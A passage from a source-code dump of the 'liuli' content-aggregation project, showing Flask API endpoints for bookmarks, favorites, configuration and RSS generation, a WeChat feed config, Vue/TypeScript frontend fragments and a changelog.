58 | "rows": [], 59 | "rows_info": [] 60 | } 61 | } 62 | }, 63 | "info": "ok", 64 | "status": 200 65 | } 66 | ``` 67 | 68 | #### 失败示例 69 | 70 | ```json 71 | { 72 | "data": {}, 73 | "info": "用户修改密码失败", 74 | "status": 902 75 | } 76 | ``` 77 | -------------------------------------------------------------------------------- /src/api/http_app.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2021/4/10. 3 | Description:HTTP API 服务 4 | - 启动命令: 5 | - gunicorn: pipenv run gunicorn -c src/config/gunicorn.py src.api.http_app:app 6 | - flask: pipenv run python src/api/http_app.py 7 | Changelog: all notable changes to this file will be documented 8 | """ 9 | 10 | from flask import Flask 11 | from flask_jwt_extended import JWTManager 12 | 13 | from src.api.liuli_init import init_liuli_app 14 | from src.api.views import bp_api, bp_backup, bp_rss 15 | from src.config import Config 16 | 17 | 18 | def create_app(): 19 | """ 20 | 建立web应用 21 | url: http://flask.pocoo.org/docs/1.0/quickstart/ 22 | :return: 23 | """ 24 | flask_app = Flask(__name__) 25 | 26 | with flask_app.app_context(): 27 | # 项目内部配置 28 | flask_app = init_liuli_app(flask_app) 29 | flask_app.config["app_logger"].info( 30 | f"server({Config.VERSION}) started successfully :)" 31 | ) 32 | 33 | # 注册相关蓝图 34 | flask_app.register_blueprint(bp_api) 35 | flask_app.register_blueprint(bp_rss) 36 | flask_app.register_blueprint(bp_backup) 37 | 38 | # 初始化JWT 39 | flask_app.config["JWT_SECRET_KEY"] = Config.LL_JWT_SECRET_KEY 40 | _ = JWTManager(flask_app) 41 | 42 | return flask_app 43 | 44 | 45 | app = create_app() 46 | 47 | 48 | if __name__ == "__main__": 49 | app.run( 50 | host=Config.LL_HTTP_HOST, port=Config.LL_HTTP_PORT, debug=Config.LL_HTTP_DEBUG 51 | ) 52 | -------------------------------------------------------------------------------- /src/api/views/api/doc_source/delete.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2023-03-26. 3 | Description: 删除 doc_source 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | 7 | from flask import current_app, request 8 | 9 | from src.api.common import UniResponse, jwt_required, response_handle 10 | from src.databases import MongodbBase, mongodb_delete_many_data 11 | 12 | 13 | @jwt_required() 14 | def doc_source_delete(): 15 | """删除 doc_source 16 | eg: 17 | { 18 | "username": "liuli", 19 | "doc_source": "wechat" 20 | } 21 | Returns: 22 | Response: 响应类 23 | """ 24 | # 获取基本配置 25 | mongodb_base: MongodbBase = current_app.config["mongodb_base"] 26 | app_logger = current_app.config["app_logger"] 27 | coll = mongodb_base.get_collection(coll_name="liuli_doc_source") 28 | # 获取基础数据 29 | post_data: dict = request.json 30 | doc_source = post_data.get("doc_source", "") 31 | username = post_data.get("username", "") 32 | result = UniResponse.SUCCESS 33 | 34 | db_res = mongodb_delete_many_data( 35 | coll_conn=coll, filter_dict={"doc_source": doc_source, "username": username} 36 | ) 37 | 38 | if not db_res["status"]: 39 | # 删除失败 40 | result = UniResponse.DB_ERR 41 | err_info = ( 42 | f"delete doc_source config failed! DB response info -> {db_res['info']}" 43 | ) 44 | app_logger.error(err_info) 45 | 46 | return response_handle(request=request, dict_value=result) 47 | -------------------------------------------------------------------------------- /liuli_config/feeddd.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "feeddd", 3 | "username": "liuli", 4 | "author": "liuli_team", 5 | "doc_source": "liuli_wechat_feeddd", 6 | "doc_source_alias_name": "微信源(feeddd)", 7 | "collector": { 8 | "wechat": { 9 | "feeds_dict": { 10 | "天眼透视": "https://api.feeddd.org/feeds/62308f26701766717146f267/rss", 11 | "唧唧堂": "https://api.feeddd.org/feeds/621ba34edca58a380c6bd7be/rss", 12 | "上海译文": "https://api.feeddd.org/feeds/62335fec701766717148c2f4/rss", 13 | "36氪": "https://api.feeddd.org/feeds/6131e1441269c358aa0e2141/rss" 14 | }, 15 | "delta_time": 5, 16 | "spider_type": "feeddd" 17 | } 18 | }, 19 | "processor": { 20 | "before_collect": [], 21 | "after_collect": [ 22 | { 23 | "func": "ad_marker", 24 | "cos_value": 0.6 25 | }, 26 | { 27 | "func": "to_rss", 28 | "doc_source_list": ["liuli_wechat"], 29 | "link_source": "github" 30 | } 31 | ] 32 | }, 33 | "sender": { 34 | "sender_list": ["tg"], 35 | "query_days": 7, 36 | "delta_time": 3 37 | }, 38 | "backup": { 39 | "backup_list": ["mongodb"], 40 | "query_days": 7, 41 | "delta_time": 3, 42 | "init_config": {}, 43 | "after_get_content": [ 44 | { 45 | "func": "str_replace", 46 | "before_str": "data-src=\"", 47 | "after_str": "src=\"https://images.weserv.nl/?url=" 48 | } 49 | ] 50 | }, 51 | "schedule": { 52 | "period_list": ["00:10", "12:10", "21:10"] 53 | } 54 | } 55 | -------------------------------------------------------------------------------- /src/backup/utils.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2022-01-25. 3 | Description: 存储器通用函数 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | 7 | 8 | from src.common.remote import get_html_by_requests 9 | from src.config import Config 10 | from src.processor.html_render import render_book_html 11 | from src.utils.tools import text_decompress 12 | 13 | 14 | def get_bak_doc_html(doc_data: dict, doc_html_type: str = "default") -> str: 15 | """返回不同doc_html类型下的最终html 16 | 17 | Args: 18 | doc_html_type (str): 各种获取doc_html的方式 19 | - default: 默认,获取doc_data里面的doc_html数据,不存在就使用online 20 | - online: 进行网络获取 21 | - book: 进行二次渲染,这里是渲染成书籍阅读主题 22 | doc_data (dict): 文章数据 23 | 24 | Returns: 25 | str: 处理后的 doc_html 26 | """ 27 | # 获取原始文本内容 28 | doc_link = doc_data["doc_link"] 29 | online_func = lambda url: get_html_by_requests( 30 | url=url, headers={"User-Agent": Config.LL_SPIDER_UA} 31 | ) 32 | if doc_html_type == "online": 33 | doc_html = online_func(doc_link) 34 | elif doc_html_type == "book": 35 | doc_source_name = doc_data.get("doc_source_name", "") 36 | doc_name = doc_data.get("doc_name", "") 37 | doc_core_html = text_decompress(doc_data.get("doc_core_html", "")) 38 | doc_html = render_book_html(doc_source_name, doc_name, doc_core_html) 39 | else: 40 | # 本地模式 41 | doc_html = text_decompress(doc_data.get("doc_html")) or online_func(doc_link) 42 | 43 | return doc_html 44 | -------------------------------------------------------------------------------- /liuli_web/src/layout/index.vue: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 36 | 56 | -------------------------------------------------------------------------------- /src/api/views/api/utils/book_chapter.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2023-03-26. 3 | Description: 返回书籍目录 json 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | 7 | from flask import request 8 | 9 | from src.api.common import ( 10 | ResponseCode, 11 | ResponseField, 12 | ResponseReply, 13 | UniResponse, 14 | jwt_required, 15 | response_handle, 16 | ) 17 | from src.common.remote import get_html_by_requests 18 | from src.config import Config 19 | from src.processor.text_utils import extract_chapters 20 | 21 | 22 | @jwt_required() 23 | def utils_book_chapter(): 24 | """ 25 | 返回书籍目录 json 26 | { 27 | "username": "liuli", 28 | "url": "https://www.yruan.com/article/38563.html" 29 | } 30 | """ 31 | # 获取基础数据 32 | post_data: dict = request.json 33 | url = post_data.get("url") or "" 34 | chapter_list = [] 35 | result = UniResponse.SUCCESS 36 | if url: 37 | # 目录链接必须存在 38 | resp_text = get_html_by_requests( 39 | url, headers={"User-Agent": Config.LL_SPIDER_UA} 40 | ) 41 | chapter_list = extract_chapters(url, resp_text) 42 | result = { 43 | ResponseField.DATA: { 44 | "url": url, 45 | "chapter_list": chapter_list, 46 | }, 47 | ResponseField.MESSAGE: ResponseReply.SUCCESS, 48 | ResponseField.STATUS: ResponseCode.SUCCESS, 49 | } 50 | else: 51 | result = UniResponse.PARAM_ERR 52 | 53 | return response_handle(request=request, dict_value=result) 54 | -------------------------------------------------------------------------------- /src/api/views/api/utils/book_content.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2023-03-26. 3 | Description: 基于readability算法提取文章核心内容 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | 7 | from flask import request 8 | 9 | from src.api.common import ( 10 | ResponseCode, 11 | ResponseField, 12 | ResponseReply, 13 | UniResponse, 14 | jwt_required, 15 | response_handle, 16 | ) 17 | from src.common.remote import get_html_by_requests 18 | from src.config import Config 19 | from src.processor.text_utils import extract_core_html 20 | 21 | 22 | @jwt_required() 23 | def utils_book_content(): 24 | """ 25 | 基于readability算法提取文章核心内容 26 | { 27 | "username": "liuli", 28 | "url": "https://www.yruan.com/article/38563/4082438.html" 29 | } 30 | """ 31 | # 获取基础数据 32 | post_data: dict = request.json 33 | url = post_data.get("url") or "" 34 | result = UniResponse.SUCCESS 35 | core_html = "" 36 | if url: 37 | # 章节链接必须存在 38 | resp_text = get_html_by_requests( 39 | url, headers={"User-Agent": Config.LL_SPIDER_UA} 40 | ) 41 | _, core_html = extract_core_html(resp_text) 42 | result = { 43 | ResponseField.DATA: { 44 | "url": url, 45 | "core_html": core_html, 46 | }, 47 | ResponseField.MESSAGE: ResponseReply.SUCCESS, 48 | ResponseField.STATUS: ResponseCode.SUCCESS, 49 | } 50 | else: 51 | result = UniResponse.PARAM_ERR 52 | 53 | return response_handle(request=request, dict_value=result) 54 | -------------------------------------------------------------------------------- /liuli_web/src/views/Reader/index.vue: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | {{ articleItem?.doc_name ? articleItem?.doc_name : '暂无文章' }} 5 | 6 | > 7 | 8 | 9 | 10 | 45 | 46 | -------------------------------------------------------------------------------- /src/api/views/api/bm/delete_url.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2023-03-27. 3 | Description: 删除浏览器书签 url 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | 7 | from flask import current_app, request 8 | 9 | from src.api.common import ( 10 | ResponseCode, 11 | ResponseField, 12 | ResponseReply, 13 | UniResponse, 14 | jwt_required, 15 | response_handle, 16 | ) 17 | from src.databases import MongodbBase, mongodb_delete_many_data 18 | 19 | 20 | @jwt_required() 21 | def bm_delete_url(): 22 | """ 23 | 删除浏览器书签 24 | eg: 25 | { 26 | "url_list": ["https://github.com/howie6879/liuli"] 27 | } 28 | """ 29 | # 获取基本配置 30 | mongodb_base: MongodbBase = current_app.config["mongodb_base"] 31 | app_logger = current_app.config["app_logger"] 32 | coll_bm = mongodb_base.get_collection(coll_name="liuli_bm") 33 | # 获取基础数据 34 | post_data: dict = request.json 35 | url_list = [url.strip() for url in post_data.get("url_list", [])] 36 | 37 | result = UniResponse.SUCCESS 38 | 39 | db_res: dict = mongodb_delete_many_data(coll_bm, {"url": {"$in": url_list}}) 40 | 41 | if db_res["status"]: 42 | result = { 43 | ResponseField.DATA: {}, 44 | ResponseField.MESSAGE: ResponseReply.SUCCESS, 45 | ResponseField.STATUS: ResponseCode.SUCCESS, 46 | } 47 | else: 48 | result = UniResponse.DB_ERR 49 | err_info = f"delete web bookmarket failed! DB response info -> {db_res['info']}" 50 | app_logger.error(err_info) 51 | 52 | return response_handle(request=request, dict_value=result) 53 | -------------------------------------------------------------------------------- /src/api/views/bp_api.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2023-03-26. 3 | Description: Flask 蓝图 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | import os 7 | 8 | from importlib import import_module 9 | 10 | from flask import Blueprint 11 | 12 | from src.config import API_LOGGER, Config 13 | 14 | bp_api = Blueprint("bp_api", __name__) 15 | 16 | 17 | def add_route(api_path: str): 18 | """ 19 | 增加路由 20 | Args: 21 | api_path (str): 路由函数名称 22 | """ 23 | 24 | if "__" not in api_path and api_path.endswith("py"): 25 | try: 26 | api_path = api_path.replace(".py", "") 27 | route_path = api_path.split("views")[-1] 28 | module_path = api_path.split("src")[-1].replace("/", ".") 29 | view_func = api_path.split("views/api/")[-1].replace("/", "_") 30 | action_module = import_module(f"src{module_path}") 31 | bp_api.add_url_rule( 32 | route_path, 33 | view_func=getattr(action_module, view_func), 34 | methods=["POST", "GET"], 35 | ) 36 | except Exception as e: 37 | API_LOGGER.error(f"Adding the route {route_path} in Flask has failed. {e}") 38 | 39 | 40 | for each_action in os.listdir(Config.API_ACTION_DIR): 41 | action_path = full_path = os.path.join(Config.API_ACTION_DIR, each_action) 42 | if os.path.isdir(full_path): 43 | for each_dir_action in os.listdir(full_path): 44 | action_path = os.path.join(full_path, each_dir_action) 45 | add_route(action_path) 46 | 47 | else: 48 | add_route(action_path) 49 | -------------------------------------------------------------------------------- /liuli_web/src/api/shareInterface.ts: -------------------------------------------------------------------------------- 1 | export interface ICommonResp{ 2 | info: string; 3 | status: number; 4 | } 5 | 6 | export interface IPage { 7 | page: number; 8 | page_size: number; 9 | } 10 | 11 | export interface IBookMark { 12 | url: string; 13 | des: string; 14 | tags: string[]; 15 | title: string; 16 | updated_at?:number; 17 | } 18 | 19 | export interface IArticle { 20 | doc_id: string 21 | doc_author: string 22 | doc_date: string 23 | doc_des: string 24 | doc_html: string 25 | doc_image: string 26 | doc_keywords: string[] 27 | doc_link: string 28 | doc_name: string 29 | doc_source: string 30 | doc_source_account_intro: string 31 | doc_source_account_nick: string 32 | doc_source_meta_list: any[] 33 | doc_source_name: string 34 | doc_ts: number 35 | doc_type: string 36 | } 37 | 38 | export interface IDocSource { 39 | doc_source: string, 40 | doc_source_alias_name: string, 41 | username: string, 42 | author: string, 43 | backup: { 44 | backup_list: string[], 45 | query_days: number, 46 | delta_time: number, 47 | init_config: object, 48 | after_get_content: { 49 | func: string, 50 | before_str: string, 51 | after_str: string 52 | }[] 53 | }, 54 | collector: object, 55 | is_open: number, 56 | name: string, 57 | processor: { 58 | before_collect: object[], 59 | after_collect: object[] 60 | }, 61 | schedule: { 62 | period_list: string[] 63 | }, 64 | sender: { 65 | sender_list: string[], 66 | query_days: number, 67 | delta_time: number 68 | }, 69 | updated_at: number 70 | } -------------------------------------------------------------------------------- /src/api/views/api/favorite/delete.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2023-05-09. 3 | Description: 删除喜欢的资源 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | 7 | from flask import current_app, request 8 | 9 | from src.api.common import ( 10 | ResponseCode, 11 | ResponseField, 12 | ResponseReply, 13 | UniResponse, 14 | jwt_required, 15 | response_handle, 16 | ) 17 | from src.databases import MongodbBase, mongodb_delete_many_data 18 | 19 | 20 | @jwt_required() 21 | def favorite_delete(): 22 | """ 23 | 删除喜欢的资源 24 | eg: 25 | { 26 | "doc_id_list": [""] 27 | } 28 | """ 29 | # 获取基本配置 30 | mongodb_base: MongodbBase = current_app.config["mongodb_base"] 31 | app_logger = current_app.config["app_logger"] 32 | coll = mongodb_base.get_collection(coll_name="liuli_favorite") 33 | username = request.json["username"] 34 | post_data: dict = request.json 35 | 36 | doc_id_list: list = post_data.get("doc_id_list", []) 37 | 38 | db_res: dict = mongodb_delete_many_data( 39 | coll, {"doc_id": {"$in": doc_id_list}, "username": username} 40 | ) 41 | 42 | if db_res["status"]: 43 | result = { 44 | ResponseField.DATA: {}, 45 | ResponseField.MESSAGE: ResponseReply.SUCCESS, 46 | ResponseField.STATUS: ResponseCode.SUCCESS, 47 | } 48 | else: 49 | result = UniResponse.DB_ERR 50 | err_info = ( 51 | f"delete favorite doc id failed! DB response info -> {db_res['info']}" 52 | ) 53 | app_logger.error(err_info) 54 | 55 | return response_handle(request=request, dict_value=result) 56 | -------------------------------------------------------------------------------- /src/collector/wechat/items/sg_wechat_item.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2021-12-21. 3 | Description: 基于 Ruia 的搜狗微信页面 Item 提取类 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | 7 | from ruia import AttrField, Item, TextField 8 | 9 | 10 | class SGWechatItem(Item): 11 | """ 12 | 搜索搜狗微信公众号页面信息提取类,一般是只会有一个结果 13 | 示例:https://weixin.sogou.com/weixin?query=老胡的储物柜 14 | """ 15 | 16 | # 默认此页面是多行内容列表 17 | target_item = TextField(css_select="div.news-box>ul>li") 18 | wechat_name = TextField(css_select="p.tit>a", default="") 19 | wechat_id = TextField(css_select='label[name="em_weixinhao"]', default="") 20 | latest_title = TextField(css_select='dd>a[target="_blank"]', default="暂无更新") 21 | latest_href = AttrField(css_select='dd>a[target="_blank"]', attr="href", default="") 22 | 23 | async def clean_wechat_name(self, wechat_name: str) -> str: 24 | """ 25 | 清洗 wechat_name 26 | """ 27 | return str(wechat_name).replace("\n", "").replace(" ", "").strip() 28 | 29 | async def clean_wechat_id(self, wechat_id: str) -> str: 30 | """ 31 | 清洗 wechat_id 32 | """ 33 | return str(wechat_id).strip() 34 | 35 | async def clean_latest_title(self, latest_title: str) -> str: 36 | """ 37 | 清洗 latest_title 38 | """ 39 | return str(latest_title).replace("\n", "").replace(" ", "").strip() 40 | 41 | async def clean_latest_href(self, latest_href: str) -> str: 42 | """ 43 | 清洗 latest_href 44 | """ 45 | f_url = "" 46 | if latest_href: 47 | f_url = f"https://weixin.sogou.com/{latest_href}" 48 | return f_url 49 | -------------------------------------------------------------------------------- /src/api/views/api/bm/get_tag_list.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2023-03-27. 3 | Description: 获取 tag 列表 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | 7 | from flask import current_app, request 8 | 9 | from src.api.common import ( 10 | ResponseCode, 11 | ResponseField, 12 | ResponseReply, 13 | UniResponse, 14 | jwt_required, 15 | response_handle, 16 | ) 17 | from src.databases import MongodbBase, mongodb_find 18 | 19 | 20 | @jwt_required() 21 | def bm_get_tag_list(): 22 | """ 23 | 获取 tag 列表 24 | eg: 25 | { 26 | "tag": "" 27 | } 28 | """ 29 | # 获取基本配置 30 | mongodb_base: MongodbBase = current_app.config["mongodb_base"] 31 | app_logger = current_app.config["app_logger"] 32 | coll_bm = mongodb_base.get_collection(coll_name="liuli_bm_tags") 33 | # 获取基础数据 34 | post_data: dict = request.json 35 | tag = post_data.get("tag", "").strip() 36 | 37 | db_res: dict = mongodb_find( 38 | coll_conn=coll_bm, 39 | filter_dict={"tag": {"$regex": tag, "$options": "$i"}}, 40 | return_dict={"_id": 0}, 41 | sorted_list=[("updated_at", -1)], 42 | ) 43 | 44 | if db_res["status"]: 45 | result = { 46 | ResponseField.DATA: db_res["info"], 47 | ResponseField.MESSAGE: ResponseReply.SUCCESS, 48 | ResponseField.STATUS: ResponseCode.SUCCESS, 49 | } 50 | else: 51 | result = UniResponse.DB_ERR 52 | err_info = ( 53 | f"get web bookmarket tag list failed! DB response info -> {db_res['info']}" 54 | ) 55 | app_logger.error(err_info) 56 | 57 | return response_handle(request=request, dict_value=result) 58 | -------------------------------------------------------------------------------- /src/api/views/api/bm/search_url.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2023-03-27. 3 | Description: 通过 url 查询书签 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | 7 | from flask import current_app, request 8 | 9 | from src.api.common import ( 10 | ResponseCode, 11 | ResponseField, 12 | ResponseReply, 13 | UniResponse, 14 | jwt_required, 15 | response_handle, 16 | ) 17 | from src.databases import MongodbBase, mongodb_find 18 | 19 | 20 | @jwt_required() 21 | def bm_search_url(): 22 | """ 23 | 通过 url 查询浏览器书签 24 | eg: 25 | { 26 | "url": "https://github.com/howie6879/liuli" 27 | } 28 | """ 29 | # 获取基本配置 30 | mongodb_base: MongodbBase = current_app.config["mongodb_base"] 31 | app_logger = current_app.config["app_logger"] 32 | coll_bm = mongodb_base.get_collection(coll_name="liuli_bm") 33 | # 获取基础数据 34 | post_data: dict = request.json 35 | url = post_data.get("url", "").strip() 36 | 37 | result = UniResponse.SUCCESS 38 | 39 | db_res: dict = mongodb_find( 40 | coll_conn=coll_bm, filter_dict={"url": url}, return_dict={"_id": 0}, limit=1 41 | ) 42 | 43 | if db_res["status"]: 44 | result = { 45 | ResponseField.DATA: db_res["info"][0] if db_res["info"] else {}, 46 | ResponseField.MESSAGE: ResponseReply.SUCCESS, 47 | ResponseField.STATUS: ResponseCode.SUCCESS, 48 | } 49 | else: 50 | result = UniResponse.DB_ERR 51 | err_info = ( 52 | f"search web bookmarket url failed! DB response info -> {db_res['info']}" 53 | ) 54 | app_logger.error(err_info) 55 | 56 | return response_handle(request=request, dict_value=result) 57 | -------------------------------------------------------------------------------- /scripts/model_predict.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | Created by howie.hu at 2021/4/9. 4 | Description:模型校验脚本 5 | Changelog: all notable changes to this file will be documented 6 | """ 7 | 8 | from src.classifier import model_predict_factory 9 | from src.config import Config 10 | from src.databases import MongodbManager 11 | from src.processor import extract_keyword_list 12 | 13 | 14 | def cos_pre(text: str, cos_value: int = 0.5): 15 | """ 16 | 余弦相似度预测 17 | :param text: 18 | :type text: str 19 | :param cos_value: 20 | :type cos_value: int 21 | """ 22 | return model_predict_factory( 23 | model_name="cos", model_path="", input_dict={"text": text, "cos_value": 0.5} 24 | ).to_dict() 25 | 26 | 27 | def test_mongo_doc(): 28 | """ 29 | 测试数据库文本 30 | """ 31 | mongo_base = MongodbManager.get_mongo_base(mongodb_config=Config.LL_MONGODB_CONFIG) 32 | # coll = mongo_base.get_collection(coll_name="liuli_articles") 33 | coll = mongo_base.get_collection(coll_name="liuli_wechat_datasets") 34 | for each in coll.find({}): 35 | doc_name = each["doc_name"] 36 | model_resp = cos_pre(text=doc_name) 37 | probability = model_resp["probability"] 38 | if model_resp["result"] >= 0.5 and probability != 1.0: 39 | print(f"{doc_name} 被识别为广告[{probability}],链接为:{each['doc_link']}") 40 | 41 | 42 | if __name__ == "__main__": 43 | url = "https://mp.weixin.qq.com/s/RJPLZJXGwNbUgj3vihxfjw" 44 | text = "肝了3天!如何设计实现一个通用的微服务架构?" 45 | print(f"{text},{url},0") 46 | keyword_list = extract_keyword_list(url) 47 | keywords = " ".join(keyword_list) 48 | res = cos_pre(text=f"{text} {keywords}") 49 | print(res) 50 | # test_mongo_doc() 51 | -------------------------------------------------------------------------------- /src/api/views/api/config/update.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2023-03-27. 3 | Description: 更新 config 列表 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | 7 | from flask import current_app, request 8 | 9 | from src.api.common import ( 10 | ResponseCode, 11 | ResponseField, 12 | ResponseReply, 13 | UniResponse, 14 | jwt_required, 15 | response_handle, 16 | ) 17 | from src.databases import MongodbBase, mongodb_update_data 18 | 19 | 20 | @jwt_required() 21 | def config_update(): 22 | """ 23 | 获取 config 列表 24 | eg: 25 | { 26 | "username": "liuli", 27 | "data": { 28 | "LL_DEMO": "3" 29 | } 30 | } 31 | """ 32 | # 获取基本配置 33 | mongodb_base: MongodbBase = current_app.config["mongodb_base"] 34 | app_logger = current_app.config["app_logger"] 35 | coll = mongodb_base.get_collection(coll_name="liuli_config") 36 | # 获取基础数据 37 | post_data: dict = request.json 38 | config_data = post_data.get("data", {}) 39 | username = post_data["username"] 40 | 41 | db_res: dict = mongodb_update_data( 42 | coll_conn=coll, 43 | filter_dict={"config_flag": username}, 44 | update_data={"$set": config_data}, 45 | ) 46 | 47 | if db_res["status"]: 48 | result = { 49 | ResponseField.DATA: {}, 50 | ResponseField.MESSAGE: ResponseReply.SUCCESS, 51 | ResponseField.STATUS: ResponseCode.SUCCESS, 52 | } 53 | else: 54 | result = UniResponse.DB_ERR 55 | err_info = f"update liuli config failed! DB response info -> {db_res['info']}" 56 | app_logger.error(err_info) 57 | 58 | return response_handle(request=request, dict_value=result) 59 | -------------------------------------------------------------------------------- /CHANGELOG.md: -------------------------------------------------------------------------------- 1 | ## v0.2.0 2022-02-11 2 | 3 | `liuli` v0.2.0 👏 成功发布,看板计划见[这里](https://github.com/howie6879/liuli/projects/1),相关特性和功能提升见下方描述。 4 | 5 | **提升**: 6 | - 部分代码重构,重命名为 [liuli](https://github.com/liuli-io/liuli/issues/29) 7 | - 提升部署效率,支持`docker-compose` [#17](https://github.com/howie6879/liuli/issues/17) 8 | - 项目容量从100m缩小到3m(移除模型) 9 | 10 | **修复**: 11 | - 分发器:企业微信分发部门ID参数不定 [#16](https://github.com/howie6879/liuli/issues/16) @zyd16888 12 | - 修复含有特殊字符密码链接失败 [#35](https://github.com/liuli-io/liuli/pull/35) @gclm 13 | 14 | **特性**: 15 | - [官网](https://github.com/liuli-io/liuli/issues/19) @123seven 16 | - [LOGO](https://github.com/liuli-io/liuli/issues/23) @我妹妹 17 | - [采集器]书籍小说大类订阅支持 18 | - [分发器]支持 TG、Bark [#8](https://github.com/howie6879/liuli/issues/8) 19 | - [TG](https://github.com/liuli-io/liuli/projects/1#card-75295457) @123seven 20 | - [Bark](https://github.com/liuli-io/liuli/projects/1#card-75295458) @LeslieLeung 21 | - [RSS 支持](https://github.com/liuli-io/liuli/projects/1#card-75295442) 22 | - 备份器支持: 23 | - [MongoDB](https://github.com/liuli-io/liuli/issues/33) 24 | - [GitHub](https://github.com/liuli-io/liuli/issues/20) 25 | 26 | ## v0.1.2 2021-12-23 27 | 28 | `liuli` 正式发布第一个可用版本 v0.1.2 👏 ,终于迈出了第一步,相关特性和功能提升见下方描述。 29 | 30 | **特性**: 31 | - 完成相似度模型,等训练集增加后再提升 [#5](https://github.com/howie6879/liuli/issues/5) 32 | - 完成分发器,支持微信和钉钉 [#8](https://github.com/howie6879/liuli/issues/8) 33 | - 完成基于`playwright`的公众号采集器(以前是依赖第三方项目,不稳定)[#15](https://github.com/howie6879/liuli/issues/15) 34 | 35 | **提升**: 36 | - 完成[使用文档](https://github.com/howie6879/liuli/blob/main/docs/01.%E4%BD%BF%E7%94%A8%E6%95%99%E7%A8%8B.md) [#10](https://github.com/howie6879/liuli/issues/10) 37 | - 支持Docker部署 [liuliio/schedule:v0.1.2](https://hub.docker.com/repository/docker/howie6879/liuli/tags?page=1&ordering=last_updated) -------------------------------------------------------------------------------- /src/api/views/api/config/get.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2023-03-27. 3 | Description: 获取 config 列表 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | 7 | import json 8 | 9 | from bson import json_util 10 | from flask import current_app, request 11 | 12 | from src.api.common import ( 13 | ResponseCode, 14 | ResponseField, 15 | ResponseReply, 16 | UniResponse, 17 | jwt_required, 18 | response_handle, 19 | ) 20 | from src.databases import MongodbBase, mongodb_find 21 | 22 | 23 | @jwt_required() 24 | def config_get(): 25 | """ 26 | 获取 config 列表 27 | eg: 28 | { 29 | "username": "liuli" 30 | } 31 | """ 32 | # 获取基本配置 33 | mongodb_base: MongodbBase = current_app.config["mongodb_base"] 34 | app_logger = current_app.config["app_logger"] 35 | coll = mongodb_base.get_collection(coll_name="liuli_config") 36 | username = request.json["username"] 37 | 38 | db_res: dict = mongodb_find( 39 | coll_conn=coll, 40 | filter_dict={"config_flag": username}, 41 | return_dict={"LL_JWT_SECRET_KEY": 0, "config_flag": 0, "_id": 0}, 42 | sorted_list=[("updated_at", -1)], 43 | ) 44 | 45 | if db_res["status"]: 46 | result = { 47 | ResponseField.DATA: db_res["info"][0] if db_res["info"] else {}, 48 | ResponseField.MESSAGE: ResponseReply.SUCCESS, 49 | ResponseField.STATUS: ResponseCode.SUCCESS, 50 | } 51 | result = json.loads(json_util.dumps(result)) 52 | else: 53 | result = UniResponse.DB_ERR 54 | err_info = f"get liuli config failed! DB response info -> {db_res['info']}" 55 | app_logger.error(err_info) 56 | 57 | return response_handle(request=request, dict_value=result) 58 | -------------------------------------------------------------------------------- /src/api/views/api/action/gen_rss.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2023-03-26. 3 | Description: 生成 RSS 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | 7 | from flask import current_app, request 8 | 9 | from src.api.common import ( 10 | ResponseCode, 11 | ResponseField, 12 | ResponseReply, 13 | UniResponse, 14 | jwt_required, 15 | response_handle, 16 | ) 17 | from src.processor.rss_utils import to_rss 18 | 19 | 20 | @jwt_required() 21 | def action_gen_rss(): 22 | """生成目标 RSS 源 23 | eg: 24 | { 25 | "username": "liuli", 26 | "doc_source_list": ["liuli_wechat"], 27 | "link_source": "mongodb", 28 | "rss_count": 20 29 | } 30 | Returns: 31 | Response: 响应类 32 | """ 33 | app_logger = current_app.config["app_logger"] 34 | # 获取基础数据 35 | post_data: dict = request.json 36 | doc_source_list = post_data.get("doc_source_list", []) 37 | link_source = post_data.get("link_source", "") 38 | rss_count = int(post_data.get("rss_count", "20")) 39 | skip_ads = bool(post_data.get("skip_ads", "0") == "1") 40 | 41 | result = UniResponse.SUCCESS 42 | try: 43 | to_rss( 44 | doc_source_list=doc_source_list, 45 | link_source=link_source, 46 | skip_ads=skip_ads, 47 | rss_count=rss_count, 48 | ) 49 | except Exception as e: 50 | result = { 51 | ResponseField.DATA: {}, 52 | ResponseField.MESSAGE: ResponseReply.GEN_RSS_FAILED, 53 | ResponseField.STATUS: ResponseCode.GEN_RSS_FAILED, 54 | } 55 | err_info = f"gen rss failed! response info -> {e}" 56 | app_logger.error(err_info) 57 | return response_handle(request=request, dict_value=result) 58 | -------------------------------------------------------------------------------- /src/collector/utils.py: -------------------------------------------------------------------------------- 1 | """ 2 | Created by howie.hu at 2022-01-05. 3 | Description: 采集器常用函数 4 | Changelog: all notable changes to this file will be documented 5 | """ 6 | import time 7 | 8 | from copy import deepcopy 9 | 10 | from src.config import Config 11 | from 